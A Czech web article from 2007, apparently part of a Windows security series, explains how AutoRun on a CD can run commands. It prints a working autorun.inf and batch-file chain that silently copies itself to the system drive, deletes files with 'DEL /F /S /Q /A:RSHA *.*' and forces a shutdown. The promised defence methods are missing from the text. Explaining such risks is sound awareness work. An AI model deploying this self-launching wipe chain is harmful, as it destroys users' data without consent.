Utility a zabezpečení Windows - 11. díl
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

Utility a zabezpečení Windows - 11. dílUtility a zabezpečení Windows - 11. díl

 
Hledat
Moderní platforma pro vytvoření vašeho nového webu – Wix.com.
Nyní už můžete mít web zdarma.
Vybavení pro Laser Game
Spuštěn Filmový magazín

Utility a zabezpečení Windows - 11. díl

Google       Google       11. 8. 2007       16 165×

Chcete se dozvědět, jaké nebezpečí vám hrozí kvůli zapnutému AutoRunu? Čtěte dál.

Reklama
Reklama

AutoRun zajišťuje automatické načtení média při vložení do PC, znáte to například z různých CD/DVD, co se přidávájí k herním časopisům, po vložení CD Vám automaticky naběhne většinou menu. Říkáte si, že je to v pořádku, ale teď si vemte, že to někdo přenastaví tak, aby se místo zobrazení nějakého menu vykonal nějaký příkaz, třeba DEL /F /S /Q /A:RSHA *.*, to by jistě nebylo moc příjemné.

Nejdříve bych vysvětlil, jak to vlastně funguje. Představte si, že na CD máte tyto 3 soubory: „autorun.inf“, „script.cmd“ a „script2.cmd“. Při vložení CD se zpracuje soubor „autorun.inf“. „Autorun.inf“ může obsahovat třeba:

[AutoRun]
open=script.cmd

To znamená, že otevře (spustí) soubor script.cmd; ve script.cmd může být prakticky cokoliv, třeba toto:

@ECHO OFF
COPY "script2.cmd" "%systemdrive%\script2.cmd" /Y
START "%systemdrive%\script2.cmd" /B

@ECHO OFF skrývá příkazy, copy kopíruje soubor script2.cmd do %systemdrive% (nejčastěji C:). START spouští script2.cmd už z pevného disku (je to „ochrana“, kdyby uživatel vyndal CD), „/B“ je přepínač, který zajistí, aby se spustila aplikace bez vytvoření nového okna, v našem případě script2.cmd.

A konečně jdeme na obsah souboru script2.cmd, ten v sobě může obsahovat naprosto cokoliv. Třeba:

@ECHO OFF
DEL /F /S /Q /A:RSHA *.*
SHUTDOWN -s -f -t 5 -c "n00b!"

DEL smaže skoro celý disk a díky přepínačům do toho nemůžete nijak moc zasahovat, shutdown vypne počítač za 5 sekund, zobrazí komentář „n00b!“. Toto je důvod, proč tento článek píšu. Můžete takto lehce přijít o svá data, ale mezi námi, s tímto způsobem ztráty dat se potýkáme velice málo…

Obrana

Jsem obeznámen se dvěma metodami prevence:

Toť vše, případné dotazy do komentářů.

Příští téma – msgina.dll a fakegina.dll.

×Odeslání článku na tvůj Kindle

Zadej svůj Kindle e-mail a my ti pošleme článek na tvůj Kindle.
Musíš mít povolený příjem obsahu do svého Kindle z naší e-mailové adresy kindle@programujte.com.

E-mailová adresa (např. novak@kindle.com):

TIP: Pokud chceš dostávat naše články každé ráno do svého Kindle, koukni do sekce Články do Kindle.

Hlasování bylo ukončeno    
0 hlasů
Google
(fotka) ShaiMagalAutor se zajímá o všechny kouty IT a chtěl by se uplatnit v oblasti výpočetní techniky.
Web    

Nové články

Reklama
Reklama
Obrázek ke článku NopCommerce – datová vrstva a přístup k datům – 2. díl

NopCommerce – datová vrstva a přístup k datům – 2. díl

V minulém článku jsme si představili platformu NopCommerce z globálního pohledu. V dnešním díle se již zaměříme na konkrétní část systému, a to datovou vrstvu. Představíme si základní stavební kameny systému v podobě doménových objektů. Ukážeme si, jakým způsobem rozšířit doménové objekty a jakým způsobem přistupuje NopCommerce k nastavení systému a modulů.

Obrázek ke článku Seznamte se s open source platformou NopCommerce – 1. díl

Seznamte se s open source platformou NopCommerce – 1. díl

Hledáte e-commerce řešení, které si dokážete přizpůsobit podle vašich požadavků? Chcete čistý a srozumitelný kód, se kterým bude radost pracovat? Prozkoumejte s námi možnosti open source projektu NopCommerce. Seriál programování pod NopCommerce vám pomůže překonat první kroky nejistoty a úspěšně zvládnout vývoj pod platformou NopCommerce.

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032017 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý